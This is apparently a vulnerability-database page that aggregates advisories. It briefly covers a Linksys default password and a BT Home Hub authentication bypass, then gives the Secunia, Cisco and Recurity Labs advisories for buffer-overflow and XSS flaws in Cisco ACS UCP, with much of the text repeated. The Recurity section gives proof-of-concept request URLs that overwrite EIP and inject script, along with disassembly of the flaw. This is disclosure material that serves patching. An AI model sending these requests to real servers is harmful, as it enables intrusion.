VARIoT IoT vulnerabilities database

The Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.01.03 and earlier firmware has "admin" as its default password for the "admin" account, which makes it easier for remote attackers to obtain access. Wireless-G ADSL Gateway WAG54GS is prone to a remote security vulnerability

cgi/b on the BT Home Hub router allows remote attackers to bypass authentication, and read or modify administrative settings or make arbitrary VoIP telephone calls, by placing a character at the end of the PATH_INFO, as demonstrated by (1) %5C (encoded backslash), (2) '%' (percent), and (3) '~' (tilde). NOTE: the '/' (slash) vector is already covered by CVE-2007-5383. The problem is CVE-2007-5383 And may overlap.By a third party PATH_INFO By placing a letter at the end to prevent authentication, read or change management settings, or any VoIP There is a possibility of being called by phone. Home Hub is prone to a security bypass vulnerability

Multiple buffer overflows in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to execute arbitrary code via a long argument located immediately after the Logout argument, and possibly unspecified other vectors. Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities. Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers. The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205. These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Cisco User-Changeable Password Multiple Vulnerabilities SECUNIA ADVISORY ID: SA29351 VERIFY ADVISORY: http://secunia.com/advisories/29351/ CRITICAL: Highly critical IMPACT: Cross Site Scripting, DoS, System access WHERE: >From remote SOFTWARE: Cisco User-Changeable Password 4.x http://secunia.com/product/17930/ DESCRIPTION: Some vulnerabilities have been reported in Cisco User-Changeable Password (UCP), which can be exploited by malicious people to conduct cross-site scripting attacks or potentially to compromise a vulnerable system. 1) Multiple boundary errors exist within the UCP CGI script ("CSuserGCI.exe") when processing the "Logout", "Main", and "ChangePass" arguments. These can be exploited to cause buffer overflows via overly long subsequent arguments. NOTE: Other arguments may also be affected. Successful exploitation may allow execution of arbitrary code. 2) Input passed via the "Help" parameter to the UCP CGI script ("CSuserCGI.exe") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml Recurity Labs: http://www.recurity-labs.com/content/pub/RecurityLabs_Cisco_ACS_UCP_advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The second set of vulnerabilities address cross-site scripting in the UCP application pages. Both sets of vulnerabilities could be remotely exploited, and do not require valid user credentials. Cisco has released a free software update for UCP that addresses these vulnerabilities. There are no workarounds that mitigate these vulnerabilities. UCP is not installed by default with ACS installations. Users can perform the following steps to determine the version of UCP installed on a system: 1. Log in to the system where UCP is installed 2. Open a Windows command prompt 3. Change the current working directory to the default directory of the CGI scripts that was specified during installation of UCP. The default installation directory is "C:\Inetpub\Wwwroot\securecgi-bin". Within this directory execute the command "CSuserCGI ver". The output returned will indicate a CSuserCGI version. Any version earlier than 4.2 is vulnerable. The following example shows a system with UCP version 4.2 installed. C:\> c: C:\> cd c:\inetpub\Wwwroot\securecgi-bin C:\Inetpub\Wwwroot\securecgi-bin>CSuserCGI ver CSuserCGI 4.2, Copyright 2008 Cisco Systems Inc Products Confirmed Not Vulnerable +-------------------------------- Installations of Cisco Secure ACS for Windows or Cisco Secure ACS Solution Engine without UCP installed, are not vulnerable. Cisco Secure ACS for UNIX, does not support the UCP utility and is not vulnerable. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The UCP application enables end users to change their ACS passwords with a web-based utility. When users need to change their own passwords, they can access the UCP web page by using a supported web browser, validate their existing credentials, and then change their password via the utility. For more information about the UCP application please see http://www.cisco.com/en/US/docs/net_mgmt/cisco_secure_access_control_server_for_windows/4.2/installation/guide/user_passwords/ucp.html. Several vulnerabilities exist within the UCP application. * Multiple Buffer Overflow Vulnerabilities. Multiple buffer overflows exist within the UCP CSuserCGI.exe code. CSuserGCI.exe is the HTTP interface to the server. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss . * CSCsl49180: Multiple Buffer Overflow Vulnerabilities. CVSS Base Score - 10 Access Vector: Network Access Complexity: Low Authentication: None Confidentiality Impact: Complete Integrity Impact: Complete Availability Impact: Complete CVSS Temporal Score - 8.3 Exploitability: Functional Remediation Level: Official-Fix Report Confidence: Confirmed * CSCsl49205: Cross Site Scripting Vulnerabilities. CVSS Base Score - 4.3 Access Vector: Network Access Complexity: Medium Authentication: None Confidentiality Impact: None Integrity Impact: Partial Availability Impact: None CVSS Temporal Score - 3.6 Exploitability: Functional Remediation Level: Official-Fix Report Confidence: Confirmed Impact ====== Successful exploitation of the buffer overflow vulnerabilities may result in the execution of arbitrary code on the system the UCP application is installed. Successful exploitation of the cross-site scripting vulnerabilities may result in the embedding of malicious code and/or scripts within a UCP URL. The malicious code is likely to be a script that is embedded in the URL of a link. The malicious code may also be stored on the vulnerable server or a malicious website. An attacker could try to convince an unsuspecting user to follow a malicious link to a vulnerable UCP application server that injects (reflects) the malicious code back to the user's browser. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. UCP Version 4.2 contains the fixes for the listed vulnerabilities. UCP version 4.2 is not compatible with 3.x ACS installations. No fixed UCP version exists for 3.x ACS installations. Workarounds =========== There are no workarounds for these vulnerabilities. Cisco recommends upgrading to the fixed version of UCP. For additional information on cross-site scripting attacks and the methods used to exploit these vulnerabilities, please refer to the Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting (XSS) Threat Vectors", which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml . Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. We would like to thank Felix 'FX' Lindner, Recurity Labs GmbH for reporting this issue to us. We greatly appreciate the opportunity to work with researchers on security vulnerabilities, and welcome the opportunity to review and assist with security vulnerability reports against Cisco products. Status of this Notice: FINAL ====================== THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------------------+ | Revision 1.0 | 2008-Mar-12 | Initial Public Release | +-----------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFH1/jr86n/Gc8U/uARAs8RAJ9CjRFqB8rwYtrpXTVIol2QW7jG9wCeMT/F u8p4qv+1c9/UQTmBx5TR7O4= =U667 -----END PGP SIGNATURE----- . ________________________________________________________________________ Recurity Labs GmbH http://www.recurity-labs.com entomology@recurity-labs.com Date: 12.03.2008 ________________________________________________________________________ Vendor: Cisco Systems Product: Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application Vulnerability: Multiple remote pre-authentication buffer overflows Cross Site Scripting issue Affected Releases: ACS 3 and 4, UCP v3.3.4.12.5, CSuserCGI 3.3.1 NOT Affected Releases: UCP 4.2 and above Severity: HIGH CVE: CVE-2008-0532, CVE-2008-0533 ________________________________________________________________________ Vendor communication: 20.11.2007 Initial notification to PSIRT 20.11.2007 Response from PSIRT, PGP encrypted to PSIRT only 26.11.2007 Response from Paul Oxman / PSIRT 26.11.2007 Even more detailed information to Paul Oxman 27.11.2007 Received new PGP keys from PSIRT 27.11.2007 Retransmit 28.11.2007 Paul Oxman reports they are working on it 28.11.2007 Fix discussions with Paul Oxman 29.11.2007 Paul Oxman provides Cisco Bug IDs 29.11.2007 Fix discussions with Paul Oxman 12.12.2007 Fixed version provided for testing 13.12.2007 Feedback to the fixed code 14.12.2007 Paul Oxman acknowledges feedback 17.12.2007 Paul Oxman reports internal progress 17.12.2007 More feedback 08.01.2008 Paul Oxman reports internal progress 08.01.2008 ACK 30.01.2008 Paul Oxman proposes advisory release date 30.01.2008 Acknowleding advisory release date 27.02.2008 Paul Oxman updates on progress 27.02.2008 ACK 05.03.2008 Paul Oxman sends draft Cisco advisory 05.03.2008 Sending draft Recurity Labs advisory 06.03.2008 Paul Oxman provides fixed release version 06.03.2008 Final communication with Paul Oxman 12.03.2008 Coordinated release ________________________________________________________________________ Overview: Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application is a set of CGI programs and web site contents installed on Microsoft IIS. Additionally, CSUserCGI.exe suffers from a non-persistent Cross Site Scripting vulnerability. Description: The main() function of CSuserCGI.exe compares the first command line argument passed to the program using strcmp() against a list of supported arguments, among them "Logout", "Main", "ChangePass", etc. For most of the aguments, it will simply parse the following arguments and pass them to a wsprintf() call with format strings like "Action=%s&Username=%s&OldPass=%s&NetPass=%s". The destination buffer of these calls is located in the .data segment of the application. In case of the "Logout" argument, main() passes the second argument, usually of the form "1234.xyzab.c.username.", as well as a char[] buffer on the stack to a function that first extracts the string up to the first '.' character using strtok and then copies the string into the supplied char[] buffer. The char buffer is 96 bytes long. Accordingly, if the string before the first dot character exceeds this length, the buffer as well as the return address is overwritten. .text:00401065 mov eax, [ebx+8] ; get argv[2] .text:00401068 test eax, eax .text:0040106A jz loc_401520 .text:00401070 push eax ; char * .text:00401071 call sub_402870 ... .text:00402870 sub esp, 60h .text:00402873 mov ecx, 17h .text:00402878 xor eax, eax .text:0040287A push edi .text:0040287B lea edi, [esp+64h+var_60] .text:0040287F rep stosd .text:00402881 mov ecx, [esp+64h+arg_0] .text:00402885 stosw .text:00402887 stosb .text:00402888 lea eax, [esp+64h+var_60] .text:0040288C push eax ; int .text:0040288D push ecx ; char * .text:0040288E call sub_402940 ... .text:00402940 mov ecx, [esp+arg_0] .text:00402944 xor eax, eax .text:00402946 test ecx, ecx .text:00402948 jz locret_402A11 .text:0040294E push ebx .text:0040294F push esi .text:00402950 push edi .text:00402951 push offset a_ ; "." .text:00402956 push ecx ; char * .text:00402957 call _strtok .text:0040295C mov edi, eax .text:0040295E or ecx, 0FFFFFFFFh .text:00402961 xor eax, eax .text:00402963 mov ebx, [esp+14h+arg_4] .text:00402967 repne scasb .text:00402969 not ecx .text:0040296B sub edi, ecx .text:0040296D lea edx, [ebx+1] .text:00402970 mov eax, ecx .text:00402972 mov esi, edi .text:00402974 mov edi, edx .text:00402976 push offset a_ ; "." .text:0040297B shr ecx, 2 .text:0040297E rep movsd .text:00402980 mov ecx, eax .text:00402982 push 0 ; char * .text:00402984 and ecx, 3 .text:00402987 rep movsb Example: The following request will cause EIP to be overwritten with 0x42424242. The line may wrap, depending on how you view this file. https://target/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker. A non-persistent Cross Site Scripting vulnerability can also be triggered using the Help facility of the CGI. An example request would be as follows. The line may wrap, depending on how you view this file. https://target/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E Solution: Update to UCP version 4.2. See the Cisco Advisory for how to obtain fixed software: http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml ________________________________________________________________________ Credit: The vulnerabilities were identified by Felix 'FX' Lindner, Recurity Labs GmbH, during a cursory inspection of a customer installation of the ACS UCP product. Greets to the teams at Recurity Labs and Zynamics, Sergio Alvarez, Max Moser, Alexander Kornbrust, Maxim Salomon, Nicolas Fischbach, Karsten Schumann, Frank Becker, PSIRT, Paul Oxman, John Stewart ________________________________________________________________________ The information provided is released "as is" without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages. The contents of this advisory are copyright (c) 2008 Recurity Labs GmbH and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. ________________________________________________________________________

Multiple cross-site scripting (XSS) vulnerabilities in securecgi-bin/CSuserCGI.exe in User-Changeable Password (UCP) before 4.2 in Cisco Secure Access Control Server (ACS) for Windows and ACS Solution Engine allow remote attackers to inject arbitrary web script or HTML via an argument located immediately after the Help argument, and possibly unspecified other vectors. Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers. The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205. These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. There may also be other unknown vectors. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Cisco User-Changeable Password Multiple Vulnerabilities SECUNIA ADVISORY ID: SA29351 VERIFY ADVISORY: http://secunia.com/advisories/29351/ CRITICAL: Highly critical IMPACT: Cross Site Scripting, DoS, System access WHERE: >From remote SOFTWARE: Cisco User-Changeable Password 4.x http://secunia.com/product/17930/ DESCRIPTION: Some vulnerabilities have been reported in Cisco User-Changeable Password (UCP), which can be exploited by malicious people to conduct cross-site scripting attacks or potentially to compromise a vulnerable system. 1) Multiple boundary errors exist within the UCP CGI script ("CSuserGCI.exe") when processing the "Logout", "Main", and "ChangePass" arguments. These can be exploited to cause buffer overflows via overly long subsequent arguments. NOTE: Other arguments may also be affected. Successful exploitation may allow execution of arbitrary code. 2) Input passed via the "Help" parameter to the UCP CGI script ("CSuserCGI.exe") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. ORIGINAL ADVISORY: Cisco: http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml Recurity Labs: http://www.recurity-labs.com/content/pub/RecurityLabs_Cisco_ACS_UCP_advisory.txt ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The second set of vulnerabilities address cross-site scripting in the UCP application pages. Both sets of vulnerabilities could be remotely exploited, and do not require valid user credentials. Cisco has released a free software update for UCP that addresses these vulnerabilities. There are no workarounds that mitigate these vulnerabilities. UCP is not installed by default with ACS installations. Users can perform the following steps to determine the version of UCP installed on a system: 1. Log in to the system where UCP is installed 2. Open a Windows command prompt 3. Change the current working directory to the default directory of the CGI scripts that was specified during installation of UCP. The default installation directory is "C:\Inetpub\Wwwroot\securecgi-bin". Within this directory execute the command "CSuserCGI ver". The output returned will indicate a CSuserCGI version. Any version earlier than 4.2 is vulnerable. The following example shows a system with UCP version 4.2 installed. C:\> c: C:\> cd c:\inetpub\Wwwroot\securecgi-bin C:\Inetpub\Wwwroot\securecgi-bin>CSuserCGI ver CSuserCGI 4.2, Copyright 2008 Cisco Systems Inc Products Confirmed Not Vulnerable +-------------------------------- Installations of Cisco Secure ACS for Windows or Cisco Secure ACS Solution Engine without UCP installed, are not vulnerable. Cisco Secure ACS for UNIX, does not support the UCP utility and is not vulnerable. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The UCP application enables end users to change their ACS passwords with a web-based utility. When users need to change their own passwords, they can access the UCP web page by using a supported web browser, validate their existing credentials, and then change their password via the utility. For more information about the UCP application please see http://www.cisco.com/en/US/docs/net_mgmt/cisco_secure_access_control_server_for_windows/4.2/installation/guide/user_passwords/ucp.html. Several vulnerabilities exist within the UCP application. * Multiple Buffer Overflow Vulnerabilities. Multiple buffer overflows exist within the UCP CSuserCGI.exe code. CSuserGCI.exe is the HTTP interface to the server. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss . * CSCsl49180: Multiple Buffer Overflow Vulnerabilities. CVSS Base Score - 10 Access Vector: Network Access Complexity: Low Authentication: None Confidentiality Impact: Complete Integrity Impact: Complete Availability Impact: Complete CVSS Temporal Score - 8.3 Exploitability: Functional Remediation Level: Official-Fix Report Confidence: Confirmed * CSCsl49205: Cross Site Scripting Vulnerabilities. CVSS Base Score - 4.3 Access Vector: Network Access Complexity: Medium Authentication: None Confidentiality Impact: None Integrity Impact: Partial Availability Impact: None CVSS Temporal Score - 3.6 Exploitability: Functional Remediation Level: Official-Fix Report Confidence: Confirmed Impact ====== Successful exploitation of the buffer overflow vulnerabilities may result in the execution of arbitrary code on the system the UCP application is installed. Successful exploitation of the cross-site scripting vulnerabilities may result in the embedding of malicious code and/or scripts within a UCP URL. The malicious code is likely to be a script that is embedded in the URL of a link. The malicious code may also be stored on the vulnerable server or a malicious website. An attacker could try to convince an unsuspecting user to follow a malicious link to a vulnerable UCP application server that injects (reflects) the malicious code back to the user's browser. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. UCP Version 4.2 contains the fixes for the listed vulnerabilities. UCP version 4.2 is not compatible with 3.x ACS installations. No fixed UCP version exists for 3.x ACS installations. Workarounds =========== There are no workarounds for these vulnerabilities. Cisco recommends upgrading to the fixed version of UCP. For additional information on cross-site scripting attacks and the methods used to exploit these vulnerabilities, please refer to the Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting (XSS) Threat Vectors", which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml . Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. We would like to thank Felix 'FX' Lindner, Recurity Labs GmbH for reporting this issue to us. We greatly appreciate the opportunity to work with researchers on security vulnerabilities, and welcome the opportunity to review and assist with security vulnerability reports against Cisco products. Status of this Notice: FINAL ====================== THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-----------------------------------------------------+ | Revision 1.0 | 2008-Mar-12 | Initial Public Release | +-----------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFH1/jr86n/Gc8U/uARAs8RAJ9CjRFqB8rwYtrpXTVIol2QW7jG9wCeMT/F u8p4qv+1c9/UQTmBx5TR7O4= =U667 -----END PGP SIGNATURE----- . ________________________________________________________________________ Recurity Labs GmbH http://www.recurity-labs.com entomology@recurity-labs.com Date: 12.03.2008 ________________________________________________________________________ Vendor: Cisco Systems Product: Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application Vulnerability: Multiple remote pre-authentication buffer overflows Cross Site Scripting issue Affected Releases: ACS 3 and 4, UCP v3.3.4.12.5, CSuserCGI 3.3.1 NOT Affected Releases: UCP 4.2 and above Severity: HIGH CVE: CVE-2008-0532, CVE-2008-0533 ________________________________________________________________________ Vendor communication: 20.11.2007 Initial notification to PSIRT 20.11.2007 Response from PSIRT, PGP encrypted to PSIRT only 26.11.2007 Response from Paul Oxman / PSIRT 26.11.2007 Even more detailed information to Paul Oxman 27.11.2007 Received new PGP keys from PSIRT 27.11.2007 Retransmit 28.11.2007 Paul Oxman reports they are working on it 28.11.2007 Fix discussions with Paul Oxman 29.11.2007 Paul Oxman provides Cisco Bug IDs 29.11.2007 Fix discussions with Paul Oxman 12.12.2007 Fixed version provided for testing 13.12.2007 Feedback to the fixed code 14.12.2007 Paul Oxman acknowledges feedback 17.12.2007 Paul Oxman reports internal progress 17.12.2007 More feedback 08.01.2008 Paul Oxman reports internal progress 08.01.2008 ACK 30.01.2008 Paul Oxman proposes advisory release date 30.01.2008 Acknowleding advisory release date 27.02.2008 Paul Oxman updates on progress 27.02.2008 ACK 05.03.2008 Paul Oxman sends draft Cisco advisory 05.03.2008 Sending draft Recurity Labs advisory 06.03.2008 Paul Oxman provides fixed release version 06.03.2008 Final communication with Paul Oxman 12.03.2008 Coordinated release ________________________________________________________________________ Overview: Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) application is a set of CGI programs and web site contents installed on Microsoft IIS. Additionally, CSUserCGI.exe suffers from a non-persistent Cross Site Scripting vulnerability. Description: The main() function of CSuserCGI.exe compares the first command line argument passed to the program using strcmp() against a list of supported arguments, among them "Logout", "Main", "ChangePass", etc. For most of the aguments, it will simply parse the following arguments and pass them to a wsprintf() call with format strings like "Action=%s&Username=%s&OldPass=%s&NetPass=%s". The destination buffer of these calls is located in the .data segment of the application. In case of the "Logout" argument, main() passes the second argument, usually of the form "1234.xyzab.c.username.", as well as a char[] buffer on the stack to a function that first extracts the string up to the first '.' character using strtok and then copies the string into the supplied char[] buffer. The char buffer is 96 bytes long. Accordingly, if the string before the first dot character exceeds this length, the buffer as well as the return address is overwritten. .text:00401065 mov eax, [ebx+8] ; get argv[2] .text:00401068 test eax, eax .text:0040106A jz loc_401520 .text:00401070 push eax 